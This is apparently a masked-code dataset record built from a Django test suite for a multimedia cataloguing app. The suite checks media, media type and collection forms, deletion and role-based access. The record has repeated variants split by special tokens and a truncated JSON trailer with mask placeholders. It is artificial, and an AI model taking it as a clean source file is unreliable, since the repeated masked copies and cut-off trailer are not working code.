'Coleção de teste 1', created_by_id=1, cooperative_center_code=
'BR1.1')
MediaCollection.objects.create(name='Coleção 2', description=
'Coleção de teste 2', created_by_id=2, cooperative_center_code=
'BR1.1')
MediaCollection.objects.create(name='Coleção 3', description=
'Coleção de teste 3', created_by_id=3, cooperative_center_code=
'PY3.8')
response = self.client.get('/multimedia/collections')
self.assertContains(response, 'Coleção 1')
self.assertEquals(response.context['object_list'].count(), 3)
response = self.client.get(
'/multimedia/collections/?filter_created_by_cc=BR1.1')
self.assertEquals(response.context['object_list'].count(), 2)
def test_add_media_collection(self):
"""
Tests add media collection
"""
self.login_editor()
form_data = {'name': 'Coleção nova', 'description':
'Coleção de teste', 'language': 'pt-br',
'mediacollectionlocal_set-TOTAL_FORMS': '0',
'mediacollectionlocal_set-INITIAL_FORMS': '0'}
response = self.client.post('/multimedia/collection/new', form_data,
follow=True)
self.assertRedirects(response, '/multimedia/collections')
self.assertContains(response, 'Coleção nova')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MultimediaTest(BaseTestCase):
<|reserved_special_token_0|>
def setUp(self):
super(MultimediaTest, self).setUp()
media_type = MediaType.objects.create(acronym='video', name='Video')
thematic_area = ThematicArea.objects.create(acronym='LISBR1.1',
name='Teste')
<|reserved_special_token_0|>
def test_add_media(self):
"""
Tests create media
"""
self.login_editor()
form_data = minimal_form_data()
response = self.client.post('/multimedia/new', form_data)
self.assertContains(response,
'Por favor verifique os campos obrigatórios')
self.assertContains(response,
'Você precisa inserir pelo menos um descritor de assunto')
self.assertContains(response,
'Você precisa selecionar pelo menos uma área temática')
form_data = complete_form_data()
response = self.client.post('/multimedia/new', form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, 'Foto 1')
self.assertEquals(Media.objects.all()[0].cooperative_center_code,
'BR1.1')
def test_edit_media(self):
"""
Tests edit media
"""
self.login_editor()
create_media_object()
media_test = Media.objects.all()[0]
url = '/multimedia/edit/{0}'.format(media_test.id)
response = self.client.get(url)
self.assertContains(response, media_test.title)
form_data = complete_form_data()
form_data['status'] = '1'
response = self.client.post(url, form_data)
self.assertContains(response,
'é necessário ter pelo menos um descritor')
form_data['status'] = '0'
response = self.client.post(url, form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, 'Foto 1')
def test_delete_media(self):
"""
Tests delete media
"""
self.login_editor()
create_media_object()
response = self.client.get('/multimedia/delete/1')
self.assertContains(response, 'Você tem certeza que deseja apagar?')
response = self.client.post('/multimedia/delete/1')
self.assertTrue(Media.objects.filter(id=1).count() == 0)
self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)
self.assertTrue(ResourceThematic.objects.filter(object_id=1).count(
) == 0)
self.assertRedirects(response, '/multimedia/')
def test_list_media_type(self):
"""
Tests list media type
"""
self.login_documentalist()
response = self.client.get('/multimedia/media-types/')
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
response = self.client.get('/multimedia/media-types/')
self.assertContains(response, 'Video')
def test_add_media_type(self):
"""
Tests create media type
"""
self.login_documentalist()
response = self.client.get('/multimedia/media-type/new')
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
form_data = {'status': '0', 'acronym': 'foto', 'name': 'Foto',
'language': 'pt-br', 'mediatypelocal_set-TOTAL_FORMS': '0',
'mediatypelocal_set-INITIAL_FORMS': '0'}
response = self.client.post('/multimedia/media-type/new', form_data,
follow=True)
self.assertRedirects(response, '/multimedia/media-types')
self.assertContains(response, 'Foto')
def test_list_media_collection(self):
"""
Tests list of media collection
"""
self.login_editor()
MediaCollection.objects.create(name='Coleção 1', description=
'Coleção de teste 1', created_by_id=1, cooperative_center_code=
'BR1.1')
MediaCollection.objects.create(name='Coleção 2', description=
'Coleção de teste 2', created_by_id=2, cooperative_center_code=
'BR1.1')
MediaCollection.objects.create(name='Coleção 3', description=
'Coleção de teste 3', created_by_id=3, cooperative_center_code=
'PY3.8')
response = self.client.get('/multimedia/collections')
self.assertContains(response, 'Coleção 1')
self.assertEquals(response.context['object_list'].count(), 3)
response = self.client.get(
'/multimedia/collections/?filter_created_by_cc=BR1.1')
self.assertEquals(response.context['object_list'].count(), 2)
def test_add_media_collection(self):
"""
Tests add media collection
"""
self.login_editor()
form_data = {'name': 'Coleção nova', 'description':
'Coleção de teste', 'language': 'pt-br',
'mediacollectionlocal_set-TOTAL_FORMS': '0',
'mediacollectionlocal_set-INITIAL_FORMS': '0'}
response = self.client.post('/multimedia/collection/new', form_data,
follow=True)
self.assertRedirects(response, '/multimedia/collections')
self.assertContains(response, 'Coleção nova')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def minimal_form_data():
"""
Define a minimal fields for submit a media form
"""
form_data = {'status': '0', 'title': 'Foto 1', 'description': 'Foto 1',
'media_type': '1',
'main-descriptor-content_type-object_id-TOTAL_FORMS': '0',
'main-descriptor-content_type-object_id-INITIAL_FORMS': '0',
'main-keyword-content_type-object_id-TOTAL_FORMS': '0',
'main-keyword-content_type-object_id-INITIAL_FORMS': '0',
'main-resourcethematic-content_type-object_id-TOTAL_FORMS': '0',
'main-resourcethematic-content_type-object_id-INITIAL_FORMS': '0'}
return form_data
<|reserved_special_token_0|>
class MultimediaTest(BaseTestCase):
"""
Tests for multimedia app
"""
def setUp(self):
super(MultimediaTest, self).setUp()
media_type = MediaType.objects.create(acronym='video', name='Video')
thematic_area = ThematicArea.objects.create(acronym='LISBR1.1',
name='Teste')
def test_list_media(self):
"""
Test list media
"""
self.login_editor()
create_media_object()
response = self.client.get('/multimedia/')
self.assertContains(response, 'Midia de teste (BR1.1')
self.assertNotContains(response, 'Media de prueba (PY3.1)')
def test_add_media(self):
"""
Tests create media
"""
self.login_editor()
form_data = minimal_form_data()
response = self.client.post('/multimedia/new', form_data)
self.assertContains(response,
'Por favor verifique os campos obrigatórios')
self.assertContains(response,
'Você precisa inserir pelo menos um descritor de assunto')
self.assertContains(response,
'Você precisa selecionar pelo menos uma área temática')
form_data = complete_form_data()
response = self.client.post('/multimedia/new', form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, 'Foto 1')
self.assertEquals(Media.objects.all()[0].cooperative_center_code,
'BR1.1')
def test_edit_media(self):
"""
Tests edit media
"""
self.login_editor()
create_media_object()
media_test = Media.objects.all()[0]
url = '/multimedia/edit/{0}'.format(media_test.id)
response = self.client.get(url)
self.assertContains(response, media_test.title)
form_data = complete_form_data()
form_data['status'] = '1'
response = self.client.post(url, form_data)
self.assertContains(response,
'é necessário ter pelo menos um descritor')
form_data['status'] = '0'
response = self.client.post(url, form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, 'Foto 1')
def test_delete_media(self):
"""
Tests delete media
"""
self.login_editor()
create_media_object()
response = self.client.get('/multimedia/delete/1')
self.assertContains(response, 'Você tem certeza que deseja apagar?')
response = self.client.post('/multimedia/delete/1')
self.assertTrue(Media.objects.filter(id=1).count() == 0)
self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)
self.assertTrue(ResourceThematic.objects.filter(object_id=1).count(
) == 0)
self.assertRedirects(response, '/multimedia/')
def test_list_media_type(self):
"""
Tests list media type
"""
self.login_documentalist()
response = self.client.get('/multimedia/media-types/')
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
response = self.client.get('/multimedia/media-types/')
self.assertContains(response, 'Video')
def test_add_media_type(self):
"""
Tests create media type
"""
self.login_documentalist()
response = self.client.get('/multimedia/media-type/new')
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
form_data = {'status': '0', 'acronym': 'foto', 'name': 'Foto',
'language': 'pt-br', 'mediatypelocal_set-TOTAL_FORMS': '0',
'mediatypelocal_set-INITIAL_FORMS': '0'}
response = self.client.post('/multimedia/media-type/new', form_data,
follow=True)
self.assertRedirects(response, '/multimedia/media-types')
self.assertContains(response, 'Foto')
def test_list_media_collection(self):
"""
Tests list of media collection
"""
self.login_editor()
MediaCollection.objects.create(name='Coleção 1', description=
'Coleção de teste 1', created_by_id=1, cooperative_center_code=
'BR1.1')
MediaCollection.objects.create(name='Coleção 2', description=
'Coleção de teste 2', created_by_id=2, cooperative_center_code=
'BR1.1')
MediaCollection.objects.create(name='Coleção 3', description=
'Coleção de teste 3', created_by_id=3, cooperative_center_code=
'PY3.8')
response = self.client.get('/multimedia/collections')
self.assertContains(response, 'Coleção 1')
self.assertEquals(response.context['object_list'].count(), 3)
response = self.client.get(
'/multimedia/collections/?filter_created_by_cc=BR1.1')
self.assertEquals(response.context['object_list'].count(), 2)
def test_add_media_collection(self):
"""
Tests add media collection
"""
self.login_editor()
form_data = {'name': 'Coleção nova', 'description':
'Coleção de teste', 'language': 'pt-br',
'mediacollectionlocal_set-TOTAL_FORMS': '0',
'mediacollectionlocal_set-INITIAL_FORMS': '0'}
response = self.client.post('/multimedia/collection/new', form_data,
follow=True)
self.assertRedirects(response, '/multimedia/collections')
self.assertContains(response, 'Coleção nova')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def minimal_form_data():
"""
Define a minimal fields for submit a media form
"""
form_data = {'status': '0', 'title': 'Foto 1', 'description': 'Foto 1',
'media_type': '1',
'main-descriptor-content_type-object_id-TOTAL_FORMS': '0',
'main-descriptor-content_type-object_id-INITIAL_FORMS': '0',
'main-keyword-content_type-object_id-TOTAL_FORMS': '0',
'main-keyword-content_type-object_id-INITIAL_FORMS': '0',
'main-resourcethematic-content_type-object_id-TOTAL_FORMS': '0',
'main-resourcethematic-content_type-object_id-INITIAL_FORMS': '0'}
return form_data
def complete_form_data():
"""
Define missing fields for a valid submission of media object
"""
missing_fields = {'link': 'http://www.youtube.com', 'publication_date':
'01/12/2015', 'main-descriptor-content_type-object_id-TOTAL_FORMS':
'1', 'main-descriptor-content_type-object_id-0-id': '',
'main-descriptor-content_type-object_id-0-text': 'malaria',
'main-descriptor-content_type-object_id-0-code': '^d8462',
'main-descriptor-content_type-object_id-0-status': '0',
'main-resourcethematic-content_type-object_id-TOTAL_FORMS': '1',
'main-resourcethematic-content_type-object_id-0-thematic_area': '1',
'main-resourcethematic-content_type-object_id-0-status': '0'}
complete_form_data = minimal_form_data()
complete_form_data.update(missing_fields)
return complete_form_data
def create_media_object():
"""
Create media object for tests
"""
media1 = Media.objects.create(status=0, title='Midia de teste (BR1.1)',
media_type_id=1, link='http://bvsalud.org', created_by_id=1,
cooperative_center_code='BR1.1')
media_ct = ContentType.objects.get_for_model(media1)
descriptor = Descriptor.objects.create(object_id=1, content_type=
media_ct, text='malaria')
thematic = ResourceThematic.objects.create(object_id=1, content_type=
media_ct, thematic_area_id=1)
media2 = Media.objects.create(status=0, title='Media de prueba (PY3.1)',
media_type_id=1, link='http://bvsalud.org', created_by_id=2,
cooperative_center_code='PY3.1')
class MultimediaTest(BaseTestCase):
"""
Tests for multimedia app
"""
def setUp(self):
super(MultimediaTest, self).setUp()
media_type = MediaType.objects.create(acronym='video', name='Video')
thematic_area = ThematicArea.objects.create(acronym='LISBR1.1',
name='Teste')
def test_list_media(self):
"""
Test list media
"""
self.login_editor()
create_media_object()
response = self.client.get('/multimedia/')
self.assertContains(response, 'Midia de teste (BR1.1')
self.assertNotContains(response, 'Media de prueba (PY3.1)')
def test_add_media(self):
"""
Tests create media
"""
self.login_editor()
form_data = minimal_form_data()
response = self.client.post('/multimedia/new', form_data)
self.assertContains(response,
'Por favor verifique os campos obrigatórios')
self.assertContains(response,
'Você precisa inserir pelo menos um descritor de assunto')
self.assertContains(response,
'Você precisa selecionar pelo menos uma área temática')
form_data = complete_form_data()
response = self.client.post('/multimedia/new', form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, 'Foto 1')
self.assertEquals(Media.objects.all()[0].cooperative_center_code,
'BR1.1')
def test_edit_media(self):
"""
Tests edit media
"""
self.login_editor()
create_media_object()
media_test = Media.objects.all()[0]
url = '/multimedia/edit/{0}'.format(media_test.id)
response = self.client.get(url)
self.assertContains(response, media_test.title)
form_data = complete_form_data()
form_data['status'] = '1'
response = self.client.post(url, form_data)
self.assertContains(response,
'é necessário ter pelo menos um descritor')
form_data['status'] = '0'
response = self.client.post(url, form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, 'Foto 1')
def test_delete_media(self):
"""
Tests delete media
"""
self.login_editor()
create_media_object()
response = self.client.get('/multimedia/delete/1')
self.assertContains(response, 'Você tem certeza que deseja apagar?')
response = self.client.post('/multimedia/delete/1')
self.assertTrue(Media.objects.filter(id=1).count() == 0)
self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)
self.assertTrue(ResourceThematic.objects.filter(object_id=1).count(
) == 0)
self.assertRedirects(response, '/multimedia/')
def test_list_media_type(self):
"""
Tests list media type
"""
self.login_documentalist()
response = self.client.get('/multimedia/media-types/')
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
response = self.client.get('/multimedia/media-types/')
self.assertContains(response, 'Video')
def test_add_media_type(self):
"""
Tests create media type
"""
self.login_documentalist()
response = self.client.get('/multimedia/media-type/new')
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
form_data = {'status': '0', 'acronym': 'foto', 'name': 'Foto',
'language': 'pt-br', 'mediatypelocal_set-TOTAL_FORMS': '0',
'mediatypelocal_set-INITIAL_FORMS': '0'}
response = self.client.post('/multimedia/media-type/new', form_data,
follow=True)
self.assertRedirects(response, '/multimedia/media-types')
self.assertContains(response, 'Foto')
def test_list_media_collection(self):
"""
Tests list of media collection
"""
self.login_editor()
MediaCollection.objects.create(name='Coleção 1', description=
'Coleção de teste 1', created_by_id=1, cooperative_center_code=
'BR1.1')
MediaCollection.objects.create(name='Coleção 2', description=
'Coleção de teste 2', created_by_id=2, cooperative_center_code=
'BR1.1')
MediaCollection.objects.create(name='Coleção 3', description=
'Coleção de teste 3', created_by_id=3, cooperative_center_code=
'PY3.8')
response = self.client.get('/multimedia/collections')
self.assertContains(response, 'Coleção 1')
self.assertEquals(response.context['object_list'].count(), 3)
response = self.client.get(
'/multimedia/collections/?filter_created_by_cc=BR1.1')
self.assertEquals(response.context['object_list'].count(), 2)
def test_add_media_collection(self):
"""
Tests add media collection
"""
self.login_editor()
form_data = {'name': 'Coleção nova', 'description':
'Coleção de teste', 'language': 'pt-br',
'mediacollectionlocal_set-TOTAL_FORMS': '0',
'mediacollectionlocal_set-INITIAL_FORMS': '0'}
response = self.client.post('/multimedia/collection/new', form_data,
follow=True)
self.assertRedirects(response, '/multimedia/collections')
self.assertContains(response, 'Coleção nova')
<|reserved_special_token_1|>
# coding: utf-8
from django.test.client import Client
from django.contrib.contenttypes.models import ContentType
from main.models import Descriptor, ResourceThematic, ThematicArea
from utils.tests import BaseTestCase
from models import *
def minimal_form_data():
'''
Define a minimal fields for submit a media form
'''
form_data = {
'status': '0',
'title': 'Foto 1',
'description': 'Foto 1',
'media_type' : '1',
'main-descriptor-content_type-object_id-TOTAL_FORMS': '0',
'main-descriptor-content_type-object_id-INITIAL_FORMS': '0',
'main-keyword-content_type-object_id-TOTAL_FORMS': '0',
'main-keyword-content_type-object_id-INITIAL_FORMS': '0',
'main-resourcethematic-content_type-object_id-TOTAL_FORMS': '0',
'main-resourcethematic-content_type-object_id-INITIAL_FORMS': '0',
}
return form_data
def complete_form_data():
'''
Define missing fields for a valid submission of media object
'''
missing_fields = {
'link' : 'http://www.youtube.com',
'publication_date' : '01/12/2015',
'main-descriptor-content_type-object_id-TOTAL_FORMS' : '1',
'main-descriptor-content_type-object_id-0-id' : '',
'main-descriptor-content_type-object_id-0-text' : 'malaria',
'main-descriptor-content_type-object_id-0-code' : '^d8462',
'main-descriptor-content_type-object_id-0-status' : '0',
'main-resourcethematic-content_type-object_id-TOTAL_FORMS' : '1',
'main-resourcethematic-content_type-object_id-0-thematic_area' : '1',
'main-resourcethematic-content_type-object_id-0-status' : '0',
}
complete_form_data = minimal_form_data()
complete_form_data.update(missing_fields)
return complete_form_data
def create_media_object():
'''
Create media object for tests
'''
# Create a Media object and test that is present on list
media1 = Media.objects.create(status=0,title='Midia de teste (BR1.1)',
media_type_id=1, link='http://bvsalud.org', created_by_id=1,
cooperative_center_code='BR1.1')
media_ct = ContentType.objects.get_for_model(media1)
descriptor = Descriptor.objects.create(object_id=1, content_type=media_ct, text='malaria')
thematic = ResourceThematic.objects.create(object_id=1, content_type=media_ct, thematic_area_id=1)
media2 = Media.objects.create(status=0,title='Media de prueba (PY3.1)',
media_type_id=1, link='http://bvsalud.org', created_by_id=2,
cooperative_center_code='PY3.1')
class MultimediaTest(BaseTestCase):
"""
Tests for multimedia app
"""
def setUp(self):
super(MultimediaTest, self).setUp()
# create auxiliary models used on tests
media_type = MediaType.objects.create(acronym='video', name='Video')
thematic_area = ThematicArea.objects.create(acronym='LISBR1.1', name='Teste')
def test_list_media(self):
"""
Test list media
"""
self.login_editor()
create_media_object()
response = self.client.get('/multimedia/')
self.assertContains(response, "Midia de teste (BR1.1")
# list only medias from user cooperative center (BR1.1)
self.assertNotContains(response, "Media de prueba (PY3.1)")
def test_add_media(self):
"""
Tests create media
"""
self.login_editor()
# invalid submission with missing required fields
form_data = minimal_form_data()
response = self.client.post('/multimedia/new', form_data )
self.assertContains(response,'Por favor verifique os campos obrigatórios')
self.assertContains(response,'Você precisa inserir pelo menos um descritor de assunto')
self.assertContains(response,'Você precisa selecionar pelo menos uma área temática')
# complete form_data with required fields and re-submit form
form_data = complete_form_data()
# test valid submission
# after submit a valid content the view will redirect to /multimedia and list the objects
# follow=True will allow check if the new data is on the list
response = self.client.post('/multimedia/new', form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, "Foto 1")
# check if is set cooperative center code of user (editor = BR1.1)
self.assertEquals(Media.objects.all()[0].cooperative_center_code, "BR1.1")
def test_edit_media(self):
"""
Tests edit media
"""
self.login_editor()
create_media_object()
media_test = Media.objects.all()[0]
url = '/multimedia/edit/{0}'.format(media_test.id)
response = self.client.get(url)
# Test if return form with fields
self.assertContains(response, media_test.title)
# Test changes values and submit
form_data = complete_form_data()
form_data['status'] = '1'
response = self.client.post(url, form_data)
# check for validation of descriptor and thematic area for status = Admitted
self.assertContains(response, "é necessário ter pelo menos um descritor")
# check for normal edition
form_data['status'] = '0'
response = self.client.post(url, form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, "Foto 1")
def test_delete_media(self):
"""
Tests delete media
"""
self.login_editor()
create_media_object()
response = self.client.get('/multimedia/delete/1')
self.assertContains(response, "Você tem certeza que deseja apagar?")
response = self.client.post('/multimedia/delete/1')
self.assertTrue(Media.objects.filter(id=1).count() == 0)
self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)
self.assertTrue(ResourceThematic.objects.filter(object_id=1).count() == 0)
self.assertRedirects(response, '/multimedia/')
def test_list_media_type(self):
"""
Tests list media type
"""
# check if documentalist has access to list media-types
self.login_documentalist()
response = self.client.get('/multimedia/media-types/' )
# 403 = unauthorized
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
response = self.client.get('/multimedia/media-types/')
self.assertContains(response, "Video")
def test_add_media_type(self):
"""
Tests create media type
"""
# check if documentalist has access to create new media-types
self.login_documentalist()
response = self.client.get('/multimedia/media-type/new' )
# 403 = unauthorized
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
form_data = {
'status': '0',
'acronym': 'foto',
'name': 'Foto',
'language' : 'pt-br',
'mediatypelocal_set-TOTAL_FORMS': '0',
'mediatypelocal_set-INITIAL_FORMS': '0',
}
response = self.client.post('/multimedia/media-type/new', form_data, follow=True )
self.assertRedirects(response, '/multimedia/media-types')
self.assertContains(response, "Foto")
def test_list_media_collection(self):
"""
Tests list of media collection
"""
self.login_editor()
# Create a media collection object and test that is present on list
MediaCollection.objects.create(name='Coleção 1',
description='Coleção de teste 1',
created_by_id=1, cooperative_center_code='BR1.1')
MediaCollection.objects.create(name='Coleção 2',
description='Coleção de teste 2',
created_by_id=2, cooperative_center_code='BR1.1')
MediaCollection.objects.create(name='Coleção 3',
description='Coleção de teste 3',
created_by_id=3, cooperative_center_code='PY3.8')
response = self.client.get('/multimedia/collections')
# check if only one collection is returned (restrict by user)
self.assertContains(response, "Coleção 1")
self.assertEquals(response.context['object_list'].count(), 3)
# check if return only colections from cooperative center BR1.1
response = self.client.get('/multimedia/collections/?filter_created_by_cc=BR1.1')
self.assertEquals(response.context['object_list'].count(), 2)
def test_add_media_collection(self):
"""
Tests add media collection
"""
self.login_editor()
form_data = {
'name': 'Coleção nova',
'description': 'Coleção de teste',
'language': 'pt-br',
'mediacollectionlocal_set-TOTAL_FORMS': '0',
'mediacollectionlocal_set-INITIAL_FORMS': '0',
}
response = self.client.post('/multimedia/collection/new', form_data, follow=True )
self.assertRedirects(response, '/multimedia/collections')
self.assertContains(response, "Coleção nova")
|
flexible
|
{
"blob_id": "a253ab5ef80a61c3784862625cde81de4c4ef984",
"index": 2094,
"step-1": "<mask token>\n\n\nclass MultimediaTest(BaseTestCase):\n <mask token>\n <mask token>\n <mask token>\n\n def test_add_media(self):\n \"\"\"\n Tests create media\n \"\"\"\n self.login_editor()\n form_data = minimal_form_data()\n response = self.client.post('/multimedia/new', form_data)\n self.assertContains(response,\n 'Por favor verifique os campos obrigatórios')\n self.assertContains(response,\n 'Você precisa inserir pelo menos um descritor de assunto')\n self.assertContains(response,\n 'Você precisa selecionar pelo menos uma área temática')\n form_data = complete_form_data()\n response = self.client.post('/multimedia/new', form_data, follow=True)\n self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, 'Foto 1')\n self.assertEquals(Media.objects.all()[0].cooperative_center_code,\n 'BR1.1')\n\n def test_edit_media(self):\n \"\"\"\n Tests edit media\n \"\"\"\n self.login_editor()\n create_media_object()\n media_test = Media.objects.all()[0]\n url = '/multimedia/edit/{0}'.format(media_test.id)\n response = self.client.get(url)\n self.assertContains(response, media_test.title)\n form_data = complete_form_data()\n form_data['status'] = '1'\n response = self.client.post(url, form_data)\n self.assertContains(response,\n 'é necessário ter pelo menos um descritor')\n form_data['status'] = '0'\n response = self.client.post(url, form_data, follow=True)\n self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, 'Foto 1')\n\n def test_delete_media(self):\n \"\"\"\n Tests delete media\n \"\"\"\n self.login_editor()\n create_media_object()\n response = self.client.get('/multimedia/delete/1')\n self.assertContains(response, 'Você tem certeza que deseja apagar?')\n response = self.client.post('/multimedia/delete/1')\n self.assertTrue(Media.objects.filter(id=1).count() == 0)\n self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)\n self.assertTrue(ResourceThematic.objects.filter(object_id=1).count(\n ) == 0)\n self.assertRedirects(response, '/multimedia/')\n\n def test_list_media_type(self):\n \"\"\"\n Tests list media type\n \"\"\"\n self.login_documentalist()\n response = self.client.get('/multimedia/media-types/')\n self.assertEqual(response.status_code, 403)\n self.client.logout()\n self.login_admin()\n response = self.client.get('/multimedia/media-types/')\n self.assertContains(response, 'Video')\n\n def test_add_media_type(self):\n \"\"\"\n Tests create media type\n \"\"\"\n self.login_documentalist()\n response = self.client.get('/multimedia/media-type/new')\n self.assertEqual(response.status_code, 403)\n self.client.logout()\n self.login_admin()\n form_data = {'status': '0', 'acronym': 'foto', 'name': 'Foto',\n 'language': 'pt-br', 'mediatypelocal_set-TOTAL_FORMS': '0',\n 'mediatypelocal_set-INITIAL_FORMS': '0'}\n response = self.client.post('/multimedia/media-type/new', form_data,\n follow=True)\n self.assertRedirects(response, '/multimedia/media-types')\n self.assertContains(response, 'Foto')\n\n def test_list_media_collection(self):\n \"\"\"\n Tests list of media collection\n \"\"\"\n self.login_editor()\n MediaCollection.objects.create(name='Coleção 1', description=\n 'Coleção de teste 1', created_by_id=1, cooperative_center_code=\n 'BR1.1')\n MediaCollection.objects.create(name='Coleção 2', description=\n 'Coleção de teste 2', created_by_id=2, cooperative_center_code=\n 'BR1.1')\n MediaCollection.objects.create(name='Coleção 3', description=\n 'Coleção de teste 3', created_by_id=3, cooperative_center_code=\n 'PY3.8')\n response = self.client.get('/multimedia/collections')\n self.assertContains(response, 'Coleção 1')\n self.assertEquals(response.context['object_list'].count(), 3)\n response = self.client.get(\n '/multimedia/collections/?filter_created_by_cc=BR1.1')\n self.assertEquals(response.context['object_list'].count(), 2)\n\n def test_add_media_collection(self):\n \"\"\"\n Tests add media collection\n \"\"\"\n self.login_editor()\n form_data = {'name': 'Coleção nova', 'description':\n 'Coleção de teste', 'language': 'pt-br',\n 'mediacollectionlocal_set-TOTAL_FORMS': '0',\n 'mediacollectionlocal_set-INITIAL_FORMS': '0'}\n response = self.client.post('/multimedia/collection/new', form_data,\n follow=True)\n self.assertRedirects(response, '/multimedia/collections')\n self.assertContains(response, 'Coleção nova')\n",
"step-2": "<mask token>\n\n\nclass MultimediaTest(BaseTestCase):\n <mask token>\n\n def setUp(self):\n super(MultimediaTest, self).setUp()\n media_type = MediaType.objects.create(acronym='video', name='Video')\n thematic_area = ThematicArea.objects.create(acronym='LISBR1.1',\n name='Teste')\n <mask token>\n\n def test_add_media(self):\n \"\"\"\n Tests create media\n \"\"\"\n self.login_editor()\n form_data = minimal_form_data()\n response = self.client.post('/multimedia/new', form_data)\n self.assertContains(response,\n 'Por favor verifique os campos obrigatórios')\n self.assertContains(response,\n 'Você precisa inserir pelo menos um descritor de assunto')\n self.assertContains(response,\n 'Você precisa selecionar pelo menos uma área temática')\n form_data = complete_form_data()\n response = self.client.post('/multimedia/new', form_data, follow=True)\n self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, 'Foto 1')\n self.assertEquals(Media.objects.all()[0].cooperative_center_code,\n 'BR1.1')\n\n def test_edit_media(self):\n \"\"\"\n Tests edit media\n \"\"\"\n self.login_editor()\n create_media_object()\n media_test = Media.objects.all()[0]\n url = '/multimedia/edit/{0}'.format(media_test.id)\n response = self.client.get(url)\n self.assertContains(response, media_test.title)\n form_data = complete_form_data()\n form_data['status'] = '1'\n response = self.client.post(url, form_data)\n self.assertContains(response,\n 'é necessário ter pelo menos um descritor')\n form_data['status'] = '0'\n response = self.client.post(url, form_data, follow=True)\n self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, 'Foto 1')\n\n def test_delete_media(self):\n \"\"\"\n Tests delete media\n \"\"\"\n self.login_editor()\n create_media_object()\n response = self.client.get('/multimedia/delete/1')\n self.assertContains(response, 'Você tem certeza que deseja apagar?')\n response = self.client.post('/multimedia/delete/1')\n self.assertTrue(Media.objects.filter(id=1).count() == 0)\n self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)\n self.assertTrue(ResourceThematic.objects.filter(object_id=1).count(\n ) == 0)\n self.assertRedirects(response, '/multimedia/')\n\n def test_list_media_type(self):\n \"\"\"\n Tests list media type\n \"\"\"\n self.login_documentalist()\n response = self.client.get('/multimedia/media-types/')\n self.assertEqual(response.status_code, 403)\n self.client.logout()\n self.login_admin()\n response = self.client.get('/multimedia/media-types/')\n self.assertContains(response, 'Video')\n\n def test_add_media_type(self):\n \"\"\"\n Tests create media type\n \"\"\"\n self.login_documentalist()\n response = self.client.get('/multimedia/media-type/new')\n self.assertEqual(response.status_code, 403)\n self.client.logout()\n self.login_admin()\n form_data = {'status': '0', 'acronym': 'foto', 'name': 'Foto',\n 'language': 'pt-br', 'mediatypelocal_set-TOTAL_FORMS': '0',\n 'mediatypelocal_set-INITIAL_FORMS': '0'}\n response = self.client.post('/multimedia/media-type/new', form_data,\n follow=True)\n self.assertRedirects(response, '/multimedia/media-types')\n self.assertContains(response, 'Foto')\n\n def test_list_media_collection(self):\n \"\"\"\n Tests list of media collection\n \"\"\"\n self.login_editor()\n MediaCollection.objects.create(name='Coleção 1', description=\n 'Coleção de teste 1', created_by_id=1, cooperative_center_code=\n 'BR1.1')\n MediaCollection.objects.create(name='Coleção 2', description=\n 'Coleção de teste 2', created_by_id=2, cooperative_center_code=\n 'BR1.1')\n MediaCollection.objects.create(name='Coleção 3', description=\n 'Coleção de teste 3', created_by_id=3, cooperative_center_code=\n 'PY3.8')\n response = self.client.get('/multimedia/collections')\n self.assertContains(response, 'Coleção 1')\n self.assertEquals(response.context['object_list'].count(), 3)\n response = self.client.get(\n '/multimedia/collections/?filter_created_by_cc=BR1.1')\n self.assertEquals(response.context['object_list'].count(), 2)\n\n def test_add_media_collection(self):\n \"\"\"\n Tests add media collection\n \"\"\"\n self.login_editor()\n form_data = {'name': 'Coleção nova', 'description':\n 'Coleção de teste', 'language': 'pt-br',\n 'mediacollectionlocal_set-TOTAL_FORMS': '0',\n 'mediacollectionlocal_set-INITIAL_FORMS': '0'}\n response = self.client.post('/multimedia/collection/new', form_data,\n follow=True)\n self.assertRedirects(response, '/multimedia/collections')\n self.assertContains(response, 'Coleção nova')\n",
